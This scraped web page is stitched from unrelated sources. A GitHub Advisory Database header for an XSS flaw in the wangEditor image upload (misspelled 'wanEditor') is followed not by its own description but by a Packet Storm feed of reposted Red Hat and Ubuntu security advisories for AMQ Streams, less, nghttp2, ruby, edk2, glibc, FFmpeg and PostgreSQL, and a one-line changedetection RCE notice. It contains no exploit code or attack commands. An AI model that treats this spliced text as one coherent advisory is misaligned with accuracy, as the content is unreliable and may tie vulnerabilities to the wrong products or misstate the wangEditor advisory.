There is a cross-site scripting (XSS) issue in wanEditor via the image upload function in version 4.7.11. This issue has been fixed in version 4.7.12.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-25037

**wanEditor was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function**

Moderate severity GitHub Reviewed Published May 31, 2024 to the GitHub Advisory Database • Updated Jun 2, 2024

**Package**

npm @wangeditor/editor (npm)

**Affected versions**

<= 4.7.11

**Description**

Published to the GitHub Advisory Database

May 31, 2024

GHSA-9hfw-cvf4-5x25: wanEditor was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function

Red Hat Security Advisory 2024-3527-03 - Red Hat AMQ Streams 2.7.0 is now available from the Red Hat Customer Portal. Issues addressed include buffer overflow, denial of service, integer overflow, memory leak, and resource exhaustion vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3527.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat AMQ Streams 2.7.0 release and security update  
Advisory ID:        RHSA-2024:3527-03  
Product:            Red Hat AMQ Streams  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3527  
Issue date:         2024-05-31  
Revision:           03  
CVE Names:          CVE-2021-3520  
====================================================================

Summary: 

Red Hat AMQ Streams 2.7.0 is now available from the Red Hat Customer Portal.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. 

This release of Red Hat AMQ Streams 2.7.0 serves as a replacement for Red Hat AMQ Streams 2.7.0, and includes security and bug fixes, and enhancements.

Security Fix(es):

* lz4: memory corruption due to an integer overflow bug caused by memmove argument  (CVE-2021-3520)  
* zstd: Race condition allows attacker to access world-readable destination file (CVE-2021-24032)  
* RocksDB: zstd: mysql: buffer overrun in util.c  (CVE-2022-4899)  
* netty-codec-http: Allocation of Resources Without Limits or Throttling  (CVE-2024-29025)  
* commons-compress: Denial of service caused by an infinite loop for a corrupted DUMP file (CVE-2024-25710)  
* apache-commons-text: variable interpolation RCE (CVE-2022-42889)  
* snappy-java: Missing upper bound check on chunk length in snappy-java can lead to Denial of Service (DoS) impact  (CVE-2023-43642)  
* json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion)  (CVE-2023-1370)  
*  protobuf-java: timeout in parser leads to DoS (CVE-2022-3171)  
* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing  (CVE-2022-42920)  
* bc-java: Out of memory while parsing ASN.1 crafted data in org.bouncycastle.openssl.PEMParser class  (CVE-2023-33202)  
* bouncycastle: potential blind LDAP injection attack using a self-signed certificate  (CVE-2023-33201)  
* json-path: stack-based buffer overflow in Criteria.parse method  (CVE-2023-51074)  
* guava: insecure temporary directory creation  (CVE-2023-2976)  
* io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support (CVE-2024-1300)  
* io.vertx/vertx-core: memory leak due to the use of Netty FastThreadLocal data structures in Vertx (CVE-2024-1023)  
* quarkus-core: Leak of local configuration properties into Quarkus applications  (CVE-2024-2700)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-3520

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=1928090  
https://bugzilla.redhat.com/show_bug.cgi?id=1954559  
https://bugzilla.redhat.com/show_bug.cgi?id=2135435  
https://bugzilla.redhat.com/show_bug.cgi?id=2137645  
https://bugzilla.redhat.com/show_bug.cgi?id=2142707  
https://bugzilla.redhat.com/show_bug.cgi?id=2179864  
https://bugzilla.redhat.com/show_bug.cgi?id=2188542  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2215465  
https://bugzilla.redhat.com/show_bug.cgi?id=2241722  
https://bugzilla.redhat.com/show_bug.cgi?id=2251281  
https://bugzilla.redhat.com/show_bug.cgi?id=2256063  
https://bugzilla.redhat.com/show_bug.cgi?id=2260840  
https://bugzilla.redhat.com/show_bug.cgi?id=2263139  
https://bugzilla.redhat.com/show_bug.cgi?id=2264988  
https://bugzilla.redhat.com/show_bug.cgi?id=2272907  
https://bugzilla.redhat.com/show_bug.cgi?id=2273281  
https://issues.redhat.com/browse/ENTMQST-5619  
https://issues.redhat.com/browse/ENTMQST-5881  
https://issues.redhat.com/browse/ENTMQST-5882  
https://issues.redhat.com/browse/ENTMQST-5883  
https://issues.redhat.com/browse/ENTMQST-5884  
https://issues.redhat.com/browse/ENTMQST-5885  
https://issues.redhat.com/browse/ENTMQST-5886

Red Hat Security Advisory 2024-3527-03

Red Hat Security Advisory 2024-3513-03 - An update for less is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3513.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: less security updateAdvisory ID:        RHSA-2024:3513-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3513Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2024-32487====================================================================Summary: An update for less is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The \"less\" utility is a text file browser that resembles \"more\", but allows users to move backwards in the file as well as forwards. Since \"less\" does not read the entire input file at startup, it also starts more quickly than ordinary text editors.Security Fix(es):* less: OS command injection (CVE-2024-32487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32487References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2274980

Red Hat Security Advisory 2024-3513-03

Red Hat Security Advisory 2024-3501-03 - An update for nghttp2 is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3501.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nghttp2 security updateAdvisory ID:        RHSA-2024:3501-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3501Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2024-28182====================================================================Summary: An update for nghttp2 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:libnghttp2 is a library implementing the Hypertext Transfer Protocol version 2 (HTTP/2) protocol in C.Security Fix(es):* nghttp2: CONTINUATION frames DoS (CVE-2024-28182)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-28182References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268639

Red Hat Security Advisory 2024-3501-03

Red Hat Security Advisory 2024-3500-03 - An update for the ruby:3.0 module is now available for Red Hat Enterprise Linux 8. Issues addressed include HTTP response splitting and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3500.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: ruby:3.0 security updateAdvisory ID:        RHSA-2024:3500-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3500Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2021-33621====================================================================Summary: An update for the ruby:3.0 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.Security Fix(es):* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)* ruby: ReDoS vulnerability in URI (CVE-2023-28755)* ruby: ReDoS vulnerability in Time (CVE-2023-28756)* ruby: RCE vulnerability with .rdoc_options in RDoc (CVE-2024-27281)* ruby: Buffer overread vulnerability in StringIO (CVE-2024-27280)* ruby: Arbitrary memory address read vulnerability with Regex search (CVE-2024-27282)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-33621References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2149706https://bugzilla.redhat.com/show_bug.cgi?id=2184059https://bugzilla.redhat.com/show_bug.cgi?id=2184061https://bugzilla.redhat.com/show_bug.cgi?id=2270749https://bugzilla.redhat.com/show_bug.cgi?id=2270750https://bugzilla.redhat.com/show_bug.cgi?id=2276810

Red Hat Security Advisory 2024-3500-03

Red Hat Security Advisory 2024-3497-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3497.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:3497-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3497Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2023-45230====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for VirtualMachines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.Security Fix(es):* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45230References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258685https://bugzilla.redhat.com/show_bug.cgi?id=2258697

Red Hat Security Advisory 2024-3497-03

Ubuntu Security Notice 6804-1 - It was discovered that GNU C Library nscd daemon contained a stack-based buffer overflow. A local attacker could use this to cause a denial of service. It was discovered that GNU C Library nscd daemon did not properly check the cache content, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6804-1  
May 31, 2024

glibc vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in GNU C Library.

Software Description:  
- glibc: GNU C Library

Details:

It was discovered that GNU C Library nscd daemon contained a stack-based buffer  
overflow. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2024-33599)

It was discovered that GNU C Library nscd daemon did not properly check the  
cache content, leading to a null pointer dereference vulnerability. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2024-33600)

It was discovered that GNU C Library nscd daemon did not properly validate  
memory allocation in certain situations, leading to a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2024-33601)

It was discovered that GNU C Library nscd daemon did not properly handle memory  
allocation, which could lead to memory corruption. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2024-33602)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  nscd                            2.39-0ubuntu8.2

Ubuntu 23.10  
  nscd                            2.38-1ubuntu6.3

Ubuntu 22.04 LTS  
  nscd                            2.35-0ubuntu3.8

Ubuntu 20.04 LTS  
  nscd                            2.31-0ubuntu9.16

Ubuntu 18.04 LTS  
  nscd                            2.27-3ubuntu1.6+esm3  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  nscd                            2.23-0ubuntu11.3+esm7  
                                  Available with Ubuntu Pro

After a standard system update you need to restart nscd to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6804-1  
  CVE-2024-33599, CVE-2024-33600, CVE-2024-33601, CVE-2024-33602

Package Information:  
  https://launchpad.net/ubuntu/+source/glibc/2.39-0ubuntu8.2  
  https://launchpad.net/ubuntu/+source/glibc/2.38-1ubuntu6.3  
  https://launchpad.net/ubuntu/+source/glibc/2.35-0ubuntu3.8  
  https://launchpad.net/ubuntu/+source/glibc/2.31-0ubuntu9.16

Ubuntu Security Notice USN-6804-1

Ubuntu Security Notice 6803-1 - Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handled certain input files. An attacker could possibly use this issue to cause FFmpeg to crash, resulting in a denial of service, or potential arbitrary code execution. This issue only affected Ubuntu 24.04 LTS. Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handled certain input files. An attacker could possibly use this issue to cause FFmpeg to crash, resulting in a denial of service, or potential arbitrary code execution. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6803-1May 30, 2024ffmpeg vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:FFmpeg could be made to crash or run programs as your login if itopened a specially crafted file.Software Description:- ffmpeg: Tools for transcoding, streaming and playing of multimedia filesDetails:Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 24.04 LTS. (CVE-2023-49501)Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 18.04 LTS,Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.(CVE-2023-49502)Zhang Ling and Zeng Yunxiang discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 23.10 andUbuntu 24.04 LTS. (CVE-2023-49528)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 23.10 and Ubuntu 24.04 LTS.(CVE-2023-50007)Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 23.10 andUbuntu 24.04 LTS. (CVE-2023-50008)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 23.10. (CVE-2023-50009)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS,Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu 23.10. (CVE-2023-50010)Zeng Yunxiang and Li Zeyuan discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 23.10 andUbuntu 24.04 LTS. (CVE-2023-51793)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS,Ubuntu 22.04 LTS and Ubuntu 23.10. (CVE-2023-51794, CVE-2023-51798)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 23.10. (CVE-2023-51795, CVE-2023-51796)It was discovered that discovered that FFmpeg incorrectly handled certaininput files. An attacker could possibly use this issue to cause FFmpeg tocrash, resulting in a denial of service, or potential arbitrary codeexecution. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS,Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS. (CVE-2024-31578)It was discovered that discovered that FFmpeg incorrectly handled certaininput files. An attacker could possibly use this issue to cause FFmpeg tocrash, resulting in a denial of service, or potential arbitrary codeexecution. This issue only affected Ubuntu 23.10 and Ubuntu 24.04 LTS.(CVE-2024-31582)It was discovered that discovered that FFmpeg incorrectly handled certaininput files. An attacker could possibly use this issue to cause FFmpeg tocrash, resulting in a denial of service, or potential arbitrary codeexecution. This issue only affected Ubuntu 23.10. (CVE-2024-31585)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   ffmpeg                          7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavcodec-extra60              7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavcodec60                    7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavdevice60                   7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavfilter-extra9              7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavfilter9                    7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavformat-extra60             7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavformat60                   7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavutil58                     7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libpostproc57                   7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libswresample4                  7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libswscale7                     7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu ProUbuntu 23.10   ffmpeg                          7:6.0-6ubuntu1.1   libavcodec-extra60              7:6.0-6ubuntu1.1   libavcodec60                    7:6.0-6ubuntu1.1   libavdevice60                   7:6.0-6ubuntu1.1   libavfilter-extra9              7:6.0-6ubuntu1.1   libavfilter9                    7:6.0-6ubuntu1.1   libavformat-extra60             7:6.0-6ubuntu1.1   libavformat60                   7:6.0-6ubuntu1.1   libavutil58                     7:6.0-6ubuntu1.1   libpostproc57                   7:6.0-6ubuntu1.1   libswresample4                  7:6.0-6ubuntu1.1   libswscale7                     7:6.0-6ubuntu1.1Ubuntu 22.04 LTS   ffmpeg                          7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavcodec-extra58              7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavcodec58                    7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavdevice58                   7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavfilter-extra7              7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavfilter7                    7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavformat-extra               7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavformat-extra58             7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavformat58                   7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavutil56                     7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libpostproc55                   7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libswresample3                  7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libswscale5                     7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu ProUbuntu 20.04 LTS   ffmpeg                          7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavcodec-extra58              7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavcodec58                    7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavdevice58                   7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavfilter-extra7              7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavfilter7                    7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavformat58                   7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavresample4                  7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavutil56                     7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libpostproc55                   7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libswresample3                  7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libswscale5                     7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu ProUbuntu 18.04 LTS   ffmpeg                          7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavcodec-extra57              7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavcodec57                    7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavdevice57                   7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavfilter-extra6              7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavfilter6                    7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavformat57                   7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavresample3                  7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavutil55                     7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libpostproc54                   7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libswresample2                  7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libswscale4                     7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu ProUbuntu 16.04 LTS   ffmpeg                          7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavcodec-ffmpeg-extra56       7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavcodec-ffmpeg56             7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavdevice-ffmpeg56            7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavfilter-ffmpeg5             7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavformat-ffmpeg56            7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavresample-ffmpeg2           7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavutil-ffmpeg54              7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libpostproc-ffmpeg53            7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libswresample-ffmpeg1           7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libswscale-ffmpeg3              7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6803-1   CVE-2023-49501, CVE-2023-49502, CVE-2023-49528, CVE-2023-50007,   CVE-2023-50008, CVE-2023-50009, CVE-2023-50010, CVE-2023-51793,   CVE-2023-51794, CVE-2023-51795, CVE-2023-51796, CVE-2023-51798,   CVE-2024-31578, CVE-2024-31582, CVE-2024-31585Package Information:   https://launchpad.net/ubuntu/+source/ffmpeg/7:6.0-6ubuntu1.1

Ubuntu Security Notice USN-6803-1

Ubuntu Security Notice 6802-1 - Lukas Fittl discovered that PostgreSQL incorrectly performed authorization in the built-in pg_stats_ext and pg_stats_ext_exprs views. An unprivileged database user can use this issue to read most common values and other statistics from CREATE STATISTICS commands of other users.

==========================================================================  
Ubuntu Security Notice USN-6802-1  
May 30, 2024

postgresql-14, postgresql-15, postgresql-16 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS

Summary:

PostgreSQL could be made to expose sensitive information.

Software Description:  
- postgresql-16: Object-relational SQL database  
- postgresql-15: Object-relational SQL database  
- postgresql-14: Object-relational SQL database

Details:

Lukas Fittl discovered that PostgreSQL incorrectly performed authorization  
in the built-in pg_stats_ext and pg_stats_ext_exprs views. An unprivileged  
database user can use this issue to read most common values and other  
statistics from CREATE STATISTICS commands of other users.

NOTE: This update will only fix fresh PostgreSQL installations. Current  
PostgreSQL installations will remain vulnerable to this issue until manual  
steps are performed. Please see the instructions in the changelog located  
at /usr/share/doc/postgresql-*/changelog.Debian.gz after the updated  
packages have been installed, or in the PostgreSQL release notes located  
here:

https://www.postgresql.org/docs/16/release-16-3.html  
https://www.postgresql.org/docs/15/release-15-7.html  
https://www.postgresql.org/docs/14/release-14-12.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   postgresql-16                   16.3-0ubuntu0.24.04.1  
   postgresql-client-16            16.3-0ubuntu0.24.04.1

Ubuntu 23.10  
   postgresql-15                   15.7-0ubuntu0.23.10.1  
   postgresql-client-15            15.7-0ubuntu0.23.10.1

Ubuntu 22.04 LTS  
   postgresql-14                   14.12-0ubuntu0.22.04.1  
   postgresql-client-14            14.12-0ubuntu0.22.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart PostgreSQL to  
make all the necessary changes, and possibly perform manual steps as  
described above.

References:  
   https://ubuntu.com/security/notices/USN-6802-1  
   CVE-2024-4317

Package Information:  
   https://launchpad.net/ubuntu/+source/postgresql-16/16.3-0ubuntu0.24.04.1  
   https://launchpad.net/ubuntu/+source/postgresql-15/15.7-0ubuntu0.23.10.1  
   https://launchpad.net/ubuntu/+source/postgresql-14/14.12-0ubuntu0.22.04.1

Ubuntu Security Notice USN-6802-1

changedetection versions 0.45.20 and below suffer from a remote code execution vulnerability.

